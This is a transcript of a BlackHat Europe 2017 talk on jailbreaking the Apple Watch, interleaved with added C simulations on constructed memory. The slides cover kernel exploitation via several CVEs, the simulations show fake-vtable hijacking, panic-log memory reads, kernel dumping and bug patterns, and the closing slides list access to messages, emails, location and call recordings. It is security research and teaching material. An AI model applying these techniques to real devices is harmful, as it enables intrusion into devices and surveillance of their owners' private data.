Jailbreaking Apple Watch
BlackHat Europe 2017 Edition
Max Bazaliy
December 07, 2017

Transcript

  1. December 4-7, 2017
    Max Bazaliy
    Jailbreaking Apple Watch

  2. whoami
    o  Security researcher at Lookout
    o  iOS/tvOS/WatchOS jailbreak author
    o  Lead researcher on Pegasus exploit chain
    o  Focused on software and hardware exploitation

  3. What is Apple Watch?
    o  Released in 2015
    o  Apple S1/S2/S3 processor
    o  ARMv7k 32-bit architecture
    o  512/768 MB RAM
    o  Single/dual-core processor
    o  WatchOS

  4. How does it work?
    o  Fetches data from the phone
    o  Data transfer over Bluetooth
    o  Sync over Bluetooth and WiFi

  5. Why jailbreak a watch?
    o  Access to the file system (messages, emails, ...)
    o  Run debug tools on the watch (radare, frida)
    o  iPhone attack vector :)

  6. Apple Watch security
    o  Secure boot chain
    o  Mandatory Code Signing
    o  Sandbox
    o  Exploit Mitigations
    o  Data Protection
    o  Secure Enclave Processor

  7-9. Possible attack vectors (built up over three slides)
    o  Memory corruption over WebKit
    o  Boot chain attack over USB (diags port) :)
    o  Application extension based

  10. Jailbreak step by step
    o  Get initial code execution
    o  Leak kernel base
    o  Dump whole kernel (for encrypted kernels)
    o  Find gadgets and set up primitives
    o  Disable security restrictions
    o  Run an ssh server on the watch

  11. Bugs of interest
    o  WatchOS 2.x
    - CVE-2016-4656 & CVE-2016-4680
    o  WatchOS 3.1.2
    - CVE-2017-2370
    o  WatchOS 4.0.1
    - CVE-2017-13861 ? :)

  12. Leaking kernel base – WatchOS 2.x
    o  CVE-2016-4680
    o  Object constructor missing bounds check
    o  OSNumber object with a high number of bits
    o  Object length used to copy value from the stack
    o  Kernel stack memory leaked
    o  Can be triggered from an app's sandbox

  13. CVE-2016-4656 exploitation
    o  Kernel mode UAF in OSUnserializeBinary
    o  OSString object deallocated
    o  retain() called on deallocated object
    o  Fake object with fake vtable -> code exec
    o  Can be triggered from an app's sandbox

  14. Dumping WatchOS 2.x kernel
    o  Problem: no WatchOS 2.x kernel dumps
    o  No decryption keys for WatchOS kernels
    o  Idea: read kernel as OSString chunks
    o  vtable offset required to fake OSString
    o  vtable stored in __DATA.__const in kernel

  16. Getting OSString vtable
    o  OSString vtable reference in OSUnserializeBinary!
    o  OSUnserializeBinary reference in OSUnserializeXML

  17. Dumping kernel by panic logs
    o  We control the pointer to the vtable
    o  Use the address to leak as the vtable address
    o  vtable will be dereferenced by the retain() call
    o  Kernel will crash, but saves a panic log
    o  Address contents appear in the register state
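
Slides 13 and 17 both hinge on one detail of OSObject dispatch: retain() loads the vtable pointer from the first word of the object, loads a slot out of that table, and branches there. The C simulation below is added here and is not the deck's code. It walks through the three uses of that fact: a healthy object, the CVE-2016-4656 style fake-vtable hijack, and the panic-log read primitive, where the "vtable" pointer is set to the wanted address minus the slot offset so that the word at the wanted address becomes the branch target that ends up in the crash's register dump. The memory window, every address, and the retain slot index are constructed; recovering the real slot index is exactly what the deck's OSUnserializeBinary vtable reference is for.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed 32-bit "kernel" memory window. ARMv7k is 32-bit, so an object starts
   with a 4-byte vtable pointer and a vtable is an array of 4-byte code pointers. */
#define KBASE 0x80001000u
static uint8_t kmem[0x1000];

static uint32_t kread32(uint32_t addr)
{
    uint32_t v = 0;
    if (addr >= KBASE && addr + 4 <= KBASE + sizeof kmem)
        memcpy(&v, kmem + (addr - KBASE), 4);
    return v;
}

static void kwrite32(uint32_t addr, uint32_t v)
{
    if (addr >= KBASE && addr + 4 <= KBASE + sizeof kmem)
        memcpy(kmem + (addr - KBASE), &v, 4);
}

/* Assumed slot index of retain() in the vtable. The real index is build-specific. */
#define RETAIN_SLOT 4

/* What retain() does first: load the vtable pointer from offset 0 of the object,
   load the slot, branch to it. The simulation returns the branch target instead
   of branching. */
uint32_t retain_branch_target(uint32_t obj)
{
    uint32_t vtable = kread32(obj);
    return kread32(vtable + RETAIN_SLOT * 4);
}

/* Constructed layout inside the window. */
#define OBJ_ADDR    (KBASE + 0x100)  /* OSString freed by the UAF, later refilled */
#define REAL_VTABLE (KBASE + 0x200)  /* genuine OSString vtable */
#define FAKE_VTABLE (KBASE + 0x300)  /* attacker-controlled data sprayed into the heap */
#define LEAK_ADDR   (KBASE + 0x400)  /* arbitrary kernel word we want to read */
#define REAL_RETAIN 0x80011234u      /* constructed address of OSString::retain */
#define GADGET      0x80022222u      /* constructed address of attacker-chosen code */
#define SECRET_WORD 0xdeadbeefu      /* the word stored at LEAK_ADDR */

static void setup_memory(void)
{
    memset(kmem, 0, sizeof kmem);
    kwrite32(REAL_VTABLE + RETAIN_SLOT * 4, REAL_RETAIN);
    kwrite32(FAKE_VTABLE + RETAIN_SLOT * 4, GADGET);
    kwrite32(LEAK_ADDR, SECRET_WORD);
}

/* 1. Healthy object: first word is the real vtable, retain() goes where it should. */
uint32_t demo_legit(void)
{
    setup_memory();
    kwrite32(OBJ_ADDR, REAL_VTABLE);
    return retain_branch_target(OBJ_ADDR);
}

/* 2. CVE-2016-4656 style hijack: the freed object's memory is refilled with data
      whose first word points at a fake vtable, so retain() branches to the gadget. */
uint32_t demo_hijack(void)
{
    setup_memory();
    kwrite32(OBJ_ADDR, FAKE_VTABLE);
    return retain_branch_target(OBJ_ADDR);
}

/* 3. Panic-log read primitive: store (wanted - slot offset) as the vtable pointer.
      retain() then loads the word at `wanted` as its branch target; the kernel
      panics on that bogus branch and the word shows up in the panic log's
      register state. Dumping the kernel is this, four bytes at a time. */
uint32_t demo_leak(uint32_t wanted)
{
    setup_memory();
    kwrite32(OBJ_ADDR, wanted - RETAIN_SLOT * 4);
    return retain_branch_target(OBJ_ADDR);
}

int main(void)
{
    printf("legit  branch -> %08x\n", demo_legit());
    printf("hijack branch -> %08x\n", demo_hijack());
    printf("leaked word   -> %08x\n", demo_leak(LEAK_ADDR));
    return 0;
}
```

The arithmetic in demo_leak is the whole trick of the next two slides: the attacker never reads memory directly, the kernel does it on the attacker's behalf while trying to find retain(), and the crash handler writes the result down.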

  18. It's fun!

  19. Dumping kernel by 4 bytes
    o  Use the address to leak as the fake vtable address
    o  Watch will crash, wait until it restores
    o  ssh to an iPhone and run the synchronization service
    o  Copy panic from Watch to iPhone and then to Mac
    o  Parse panic, read 4 bytes and disassemble!
    o  Update address with 4-byte delta and upload app
    o  Repeat

  21. Next step – full kernel dump
    o  Now use fake OSString obj to read kernel
    o  Read data via IORegistryEntryGetProperty
    o  Leak kernel header, calculate kernel size
    o  Dump full kernel to userland by chunks
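
How the "leak kernel header, calculate kernel size, dump by chunks" step works in practice, as an added C example that is not the deck's code: parse the LC_SEGMENT commands of the 32-bit Mach-O header to get the mapped extent, then pull that range through a chunk-limited read primitive. The kernel image, its base address and the primitive are constructed stand-ins; on the device the primitive is the fake-OSString read via IORegistryEntryGetProperty, and the chunk limit is whatever one OSString can carry.

```c
#include <stdint.h>
#include <string.h>

/* 32-bit Mach-O structures as found at the start of an ARMv7k kernel image. */
#define MH_MAGIC   0xfeedfaceu
#define LC_SEGMENT 0x1u

struct mach_header32 { uint32_t magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags; };
struct load_command  { uint32_t cmd, cmdsize; };
struct segment_command32 {
    uint32_t cmd, cmdsize;
    char     segname[16];
    uint32_t vmaddr, vmsize, fileoff, filesize, maxprot, initprot, nsects, flags;
};

/* Walk the load commands of a leaked header and return the mapped extent [lo, hi)
   of its segments. hdr_len is how many header bytes we actually hold; every cmdsize
   is checked against it so a truncated header cannot walk us off the end. */
int kernel_extent(const uint8_t *hdr, size_t hdr_len, uint32_t *lo, uint32_t *hi)
{
    struct mach_header32 mh;
    if (hdr_len < sizeof mh) return -1;
    memcpy(&mh, hdr, sizeof mh);
    if (mh.magic != MH_MAGIC) return -1;
    size_t off = sizeof mh, end = sizeof mh + mh.sizeofcmds;
    if (end > hdr_len) return -1;
    uint32_t min = UINT32_MAX, max = 0;
    for (uint32_t i = 0; i < mh.ncmds; i++) {
        struct load_command lc;
        if (off + sizeof lc > end) return -1;
        memcpy(&lc, hdr + off, sizeof lc);
        if (lc.cmdsize < sizeof lc || off + lc.cmdsize > end) return -1;
        if (lc.cmd == LC_SEGMENT && lc.cmdsize >= sizeof(struct segment_command32)) {
            struct segment_command32 sc;
            memcpy(&sc, hdr + off, sizeof sc);
            if (sc.vmsize != 0 && strncmp(sc.segname, "__PAGEZERO", 16) != 0) {
                if (sc.vmaddr < min) min = sc.vmaddr;
                if (sc.vmaddr + sc.vmsize > max) max = sc.vmaddr + sc.vmsize;
            }
        }
        off += lc.cmdsize;
    }
    if (max == 0) return -1;
    *lo = min; *hi = max;
    return 0;
}

/* A kernel read primitive: read len bytes at addr into out, 0 on success. */
typedef int (*kread_fn)(uint32_t addr, void *out, size_t len);

/* Dump [lo, hi) to userland through a primitive that moves at most max_chunk
   bytes per call. */
int dump_kernel(kread_fn kread, size_t max_chunk, uint32_t lo, uint32_t hi, uint8_t *out)
{
    for (uint32_t addr = lo; addr < hi; ) {
        size_t n = hi - addr;
        if (n > max_chunk) n = max_chunk;
        if (kread(addr, out + (addr - lo), n) != 0) return -1;
        addr += n;
    }
    return 0;
}

/* ---- constructed stand-in for the real kernel so the block runs offline ---- */
#define FAKE_BASE 0x80001000u
static uint8_t fake_kernel[0x3000];   /* header, then __TEXT (2 pages) + __DATA (1 page) */
static uint8_t dumped[sizeof fake_kernel];

static void build_fake_kernel(void)
{
    struct mach_header32 mh = { MH_MAGIC, 12, 0, 2, 2, 2 * sizeof(struct segment_command32), 0 };
    struct segment_command32 text = { LC_SEGMENT, sizeof(struct segment_command32), "__TEXT",
                                      FAKE_BASE, 0x2000, 0, 0x2000, 5, 5, 0, 0 };
    struct segment_command32 data = { LC_SEGMENT, sizeof(struct segment_command32), "__DATA",
                                      FAKE_BASE + 0x2000, 0x1000, 0x2000, 0x1000, 3, 3, 0, 0 };
    memset(fake_kernel, 0xA5, sizeof fake_kernel);
    memcpy(fake_kernel, &mh, sizeof mh);
    memcpy(fake_kernel + sizeof mh, &text, sizeof text);
    memcpy(fake_kernel + sizeof mh + sizeof text, &data, sizeof data);
}

/* Simulated primitive: bounds-checked copy out of the fake kernel. */
static int fake_kread(uint32_t addr, void *out, size_t len)
{
    if (addr < FAKE_BASE || addr - FAKE_BASE + len > sizeof fake_kernel) return -1;
    memcpy(out, fake_kernel + (addr - FAKE_BASE), len);
    return 0;
}

/* End to end: leak the header, size the image, dump it in 0x100-byte chunks into
   `dumped`. Returns the number of bytes dumped, 0 on failure. */
size_t demo_dump(void)
{
    uint8_t hdr[0x400];
    uint32_t lo, hi;
    build_fake_kernel();
    if (fake_kread(FAKE_BASE, hdr, sizeof hdr) != 0) return 0;
    if (kernel_extent(hdr, sizeof hdr, &lo, &hi) != 0) return 0;
    if (hi - lo > sizeof dumped) return 0;
    if (dump_kernel(fake_kread, 0x100, lo, hi, dumped) != 0) return 0;
    return hi - lo;
}

uint8_t dumped_byte(size_t i) { return i < sizeof dumped ? dumped[i] : 0; }

/* A header cut off inside its load commands must be rejected, not walked. */
int demo_truncated_header(void)
{
    uint32_t lo, hi;
    build_fake_kernel();
    return kernel_extent(fake_kernel, 40, &lo, &hi);
}
```

On a real kernelcache the segment list is longer (the prelinked kexts live in their own segments), but the extent computed this way is still the range to dump; the bounds checks matter because the first leaked bytes are exactly the ones you trust least.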

  22. Next step – kernel symbolication
    o  Find and list all kexts
    o  Find sysent and resolve syscalls
    o  Find and resolve mach traps
    o  Resolve IOKit objects vtable

  23. Next step – setting up primitives
    o  Scan kernel dump for gadgets
    o  Set up exec primitive
    o  Set up kernel read & write primitives

  24. Jailbreaking WatchOS 3.x
    o  Kernels are not encrypted now
    o  No need to dump and symbolicate anymore
    o  New heap layout, some AMFI fixes
    o  More sandbox restrictions
    o  Vulnerable to CVE-2017-2370

  25. CVE-2017-2370
    o  Kernel heap overflow
    o  mach_voucher_extract_attr_recipe
    o  Usermode pointer is used as copyin size arg
    o  We can corrupt a mach message to get kernel RW
    o  Allocate userclient and read obj vtable -> KASLR
    o  Can be triggered from an app's sandbox
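
A simplified rendition of the bug shape behind CVE-2017-2370, added here as a C example rather than taken from XNU: the trap copies the recipe length in through a user pointer, bounds-checks it, allocates that much, and then hands the pointer itself, not the length, to the final copyin. User and kernel memory are constructed arrays, pointers are 32-bit as on ARMv7k, the 5120-byte maximum is assumed, and copyin is modelled as copying until it faults, which is what turns a size that large into an overflow instead of a clean error.

```c
#include <stdint.h>
#include <string.h>

/* Constructed "user" address space; user pointers are 32-bit, as on ARMv7k. */
#define UBASE 0x10000000u
static uint8_t umem[0x1000];

/* Constructed "kernel heap" the recipe buffer is carved from. Keeping it a fixed
   array is what lets the overflow be observed without corrupting this process. */
static uint8_t kheap[0x1000];

/* Simulated copyin(): copies byte by byte until it hits an unmapped user address,
   then returns EFAULT. As with the real one, everything before the fault has
   already been written, so a bogus huge length overflows rather than fails. */
static int copyin(uint32_t uaddr, uint8_t *kdst, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        uint32_t a = uaddr + (uint32_t)i;
        if (a < UBASE || a - UBASE >= sizeof umem) return 14;   /* EFAULT */
        kdst[i] = umem[a - UBASE];
    }
    return 0;
}

/* Trap arguments as the kernel sees them: both fields are user pointers. */
struct extract_args {
    uint32_t recipe;       /* user pointer to the recipe bytes */
    uint32_t recipe_size;  /* user pointer to a 32-bit length */
};

#define MAX_RECIPE_ARRAY_SIZE 5120u   /* assumed upper bound on the recipe length */
#define CANARY     0xA5
#define CANARY_LEN 64

/* Result codes: 0 ok, 7 too big, 22 bad argument, -1 heap corrupted past the buffer. */
int extract_attr_recipe(const struct extract_args *a, int vulnerable)
{
    uint32_t sz = 0;
    if (copyin(a->recipe_size, (uint8_t *)&sz, sizeof sz)) return 22;
    if (sz > MAX_RECIPE_ARRAY_SIZE) return 7;
    if (sz + CANARY_LEN > sizeof kheap) return 22;

    uint8_t *krbuf = kheap;                       /* allocation of exactly sz bytes */
    memset(kheap, 0, sizeof kheap);
    memset(krbuf + sz, CANARY, CANARY_LEN);       /* whatever sits after it on the heap */

    /* The bug: the user POINTER recipe_size is passed as the byte count. The fix is
       to pass sz, the value that was copied in and bounds-checked a moment ago. */
    size_t copy_len = vulnerable ? a->recipe_size : sz;
    if (copy_len > sizeof kheap) copy_len = sizeof kheap;  /* simulation guard only */
    int rc = copyin(a->recipe, krbuf, copy_len);

    for (int i = 0; i < CANARY_LEN; i++)
        if (krbuf[sz + i] != CANARY) return -1;
    return rc ? 22 : 0;
}

/* Build the user side: a length word at UBASE+0x10 and a recipe at UBASE+0x800.
   Only 0x800 user bytes are mapped after the recipe, so the vulnerable copy faults
   there, long after it has run past a 64-byte allocation. */
int demo(uint32_t length, int vulnerable)
{
    memset(umem, 0x41, sizeof umem);
    memcpy(umem + 0x10, &length, sizeof length);
    struct extract_args a = { UBASE + 0x800, UBASE + 0x10 };
    return extract_attr_recipe(&a, vulnerable);
}
```

The practitioner's check here is the pairing of the two copyins: any length that crosses the user/kernel boundary must be the value that was validated, and a pointer-typed field being passed where a size is expected is the kind of mismatch a `size_t` vs `user_addr_t` typedef is supposed to make visible.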

  26. Next step – patchfinder
    o  String / byte pattern + xref + analysis
    o  Simple ARM emulator is helpful
    o  Resolve syscalls table, mach traps table
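
The "string / byte pattern + xref" part of the patchfinder, as an added C example that is not the deck's tool: a masked byte search, plus an xref finder that decodes Thumb-2 MOVW/MOVT pairs (the way 32-bit ARM code materialises an absolute address) and reports where a given address is loaded. The blob, its base address and the marker string are constructed. The example assumes the MOVW and MOVT are adjacent and target the same register, which is the common case but not guaranteed; real patchfinders also handle LDR-literal references, which is where the deck's "simple ARM emulator" earns its keep.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static void wr16(uint8_t *p, uint16_t v) { p[0] = v & 0xff; p[1] = v >> 8; }

/* Decode a Thumb-2 MOVW (T3) or MOVT (T1) at p; 1 on match, filling rd and imm16.
   hw1 = 11110 i 10 x 1 0 0 imm4 (x = 0 for MOVW, 1 for MOVT), hw2 = 0 imm3 Rd imm8,
   imm16 = imm4:i:imm3:imm8. Halfwords are little-endian, first halfword first. */
static int decode_mov16(const uint8_t *p, int movt, int *rd, uint32_t *imm16)
{
    uint16_t hw1 = rd16(p), hw2 = rd16(p + 2);
    if ((hw1 & 0xFBF0) != (movt ? 0xF2C0 : 0xF240) || (hw2 & 0x8000)) return 0;
    uint32_t imm4 = hw1 & 0xF, i = (hw1 >> 10) & 1, imm3 = (hw2 >> 12) & 7, imm8 = hw2 & 0xFF;
    *rd = (hw2 >> 8) & 0xF;
    *imm16 = (imm4 << 12) | (i << 11) | (imm3 << 8) | imm8;
    return 1;
}

/* First occurrence of a byte pattern in buf; mask selects the bits that must match
   (NULL mask = exact match). Returns the offset or -1. */
long find_bytes(const uint8_t *buf, size_t len, const uint8_t *pat, const uint8_t *mask, size_t plen)
{
    for (size_t off = 0; off + plen <= len; off++) {
        size_t k = 0;
        while (k < plen && (buf[off + k] & (mask ? mask[k] : 0xFF)) == (pat[k] & (mask ? mask[k] : 0xFF)))
            k++;
        if (k == plen) return (long)off;
    }
    return -1;
}

/* Find code that materialises `target` with an adjacent MOVW/MOVT pair into the same
   register. Scans on halfword boundaries; returns the offset of the MOVW or -1. */
long find_movw_movt_xref(const uint8_t *buf, size_t len, uint32_t target)
{
    for (size_t off = 0; off + 8 <= len; off += 2) {
        int rd_lo, rd_hi;
        uint32_t lo, hi;
        if (decode_mov16(buf + off, 0, &rd_lo, &lo) &&
            decode_mov16(buf + off + 4, 1, &rd_hi, &hi) &&
            rd_lo == rd_hi && ((hi << 16) | lo) == target)
            return (long)off;
    }
    return -1;
}

/* Encoder, used only to construct the sample blob (inverse of decode_mov16). */
static void emit_movw_movt(uint8_t *p, int rd, uint32_t imm32)
{
    for (int t = 0; t < 2; t++, p += 4) {
        uint32_t imm16 = t ? imm32 >> 16 : imm32 & 0xFFFF;
        uint16_t hw1 = (t ? 0xF2C0 : 0xF240) | (((imm16 >> 11) & 1) << 10) | (imm16 >> 12);
        uint16_t hw2 = (((imm16 >> 8) & 7) << 12) | (rd << 8) | (imm16 & 0xFF);
        wr16(p, hw1);
        wr16(p + 2, hw2);
    }
}

/* ---- constructed kernel-like blob: code at the front, a string pool at 0x200 ---- */
#define BLOB_BASE 0x80001000u
static uint8_t blob[0x300];
static const char marker[] = "sample-kernel-string";   /* constructed, not a real XNU string */

static void build_blob(void)
{
    memset(blob, 0, sizeof blob);
    memcpy(blob + 0x200, marker, sizeof marker);
    emit_movw_movt(blob + 0x20, 1, BLOB_BASE + 0x2f0);   /* decoy: r1 = some other address */
    emit_movw_movt(blob + 0x40, 0, BLOB_BASE + 0x200);   /* r0 = &marker */
    emit_movw_movt(blob + 0x60, 0, BLOB_BASE + 0x200);   /* a later second reference */
}

/* The deck's recipe: find the string, turn its offset into a kernel address, then
   find the code that loads that address. Returns the offset of the first reference. */
long demo_string_xref(void)
{
    build_blob();
    long s = find_bytes(blob, sizeof blob, (const uint8_t *)marker, NULL, sizeof marker);
    return s < 0 ? -1 : find_movw_movt_xref(blob, sizeof blob, BLOB_BASE + (uint32_t)s);
}

/* The decoy pair must not be confused with the real reference. */
long demo_decoy_xref(void)
{
    build_blob();
    return find_movw_movt_xref(blob, sizeof blob, BLOB_BASE + 0x2f0);
}

/* Masked pattern: any MOVW into r3, whatever the immediate. Bytes are little-endian
   per halfword, so the mask keeps the opcode bits of hw1 and the Rd field of hw2. */
long demo_masked_pattern(void)
{
    build_blob();
    emit_movw_movt(blob + 0x80, 3, 0x12345678);
    const uint8_t pat[]  = { 0x40, 0xF2, 0x00, 0x03 };
    const uint8_t mask[] = { 0xF0, 0xFB, 0x00, 0x8F };
    return find_bytes(blob, sizeof blob, pat, mask, sizeof pat);
}
```

From the xref offset the rest is the "analysis" step: walk forward from the MOVW to the branch or the table access that uses the register, which is how sysent and the mach trap table are resolved from a string or a known constant nearby.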

  27. Getting root and sandbox bypass
    o  Patch setreuid (no KPP)
    o  Patch ucred in proc structure in kernel
    o  Patch sandbox label value in ucred

  28. Getting kernel task
    o  Patch task_for_pid()
    o  Or store the kernel task port in the task's bootstrap port slot
    o  Read it back via task_get_special_port()
    o  Restore original bootstrap port value

  29. Disable codesign checks
    o  Patch _debug to 1
    o  Patch _nl_symbol_ptr (GOT) entries
    o  Patch AMFI variables
    - cs_enforcement_disable
    - allow_invalid_signatures

  30. Remount rootfs
    o  Patch __mac_mount
    o  Change mount flags in rootfs vnode
    o  Patch lwvm is_write_protected check
    o  Patch PE_i_can_has_debugger in lwvm

  31. Spawning ssh server
    o  Compile dropbear ssh server for ARMv7k
    o  Compile basic tools package for ARMv7k
    o  More restricted sandbox than iOS
    o  Null out WatchOS-specific sandbox ops

  32. ssh connection problem…
    o  WatchOS interfaces
    "awdl0/ipv6" = "fe80::c837:8aff:fe60:90c2";
    "lo0/ipv4" = "127.0.0.1";
    "lo0/ipv6" = "fe80::1";
    "utun0/ipv6" = "fe80::face:5e30:271e:3cd3";
    o  Only loopback, AWDL and a utun tunnel: nothing a host can ssh to directly

  34. Watch iPhone port forwarding
    // Ask the companion proxy, through the private MobileDevice.framework
    // AMDServiceConnection API, to forward watch ("Gizmo") port `pt` to the iPhone.
    NSDictionary *comm = @{
        @"Command"               : @"StartForwardingServicePort",
        @"ForwardedServiceName"  : @"com.apple.syslog_relay",
        @"GizmoRemotePortNumber" : [NSNumber numberWithUnsignedShort:pt],
        @"IsServiceLowPriority"  : @0,
    };

    AMDServiceConnectionSendMessage(serviceConnection,
                                    (__bridge CFPropertyListRef)comm,
                                    kCFPropertyListXMLFormat_v1_0);

    CFPropertyListRef response = NULL;
    CFPropertyListFormat format;
    AMDServiceConnectionReceiveMessage(serviceConnection, &response, &format);

    // The iPhone-side port that now proxies to the watch's `pt`; ssh to it.
    NSNumber *iphone_port = ((__bridge NSDictionary *)response)[@"CompanionProxyServicePort"];

  35. Black Hat Sound Bytes

  36. SSH over WiFi
    o  Watch can be connected to 2.4 GHz WiFi
    o  Can be a little bit tricky but it works
    o  iPhone is not involved at all :)
    o  Just leak the address and connect

  37. Black Hat Sound Bytes

  38. Apple Watch usage
    o  Watch has access to SMS, calls, Health
    o  Photos and emails synced to Watch
    o  Access to GPS location
    o  Microphone usage
    o  Apple Pay

  39. Post jailbreak
    o  Full access to jailbroken watch file system
    - Messages
    - Call history
    - Contacts
    - Emails
    - GPS location

  40. What's next?
    o  Interpose or trampoline system functions
    o  Catch data on sync with an iPhone
    o  Call recordings
    o  Create tweaks for a watch
    o  Run frida and radare

  41. Black Hat sound bytes
    o  WatchOS security is mostly equal to iOS
    o  Easier data forensics on a Watch
    o  Exploits became more valuable

  42. @mbazaliy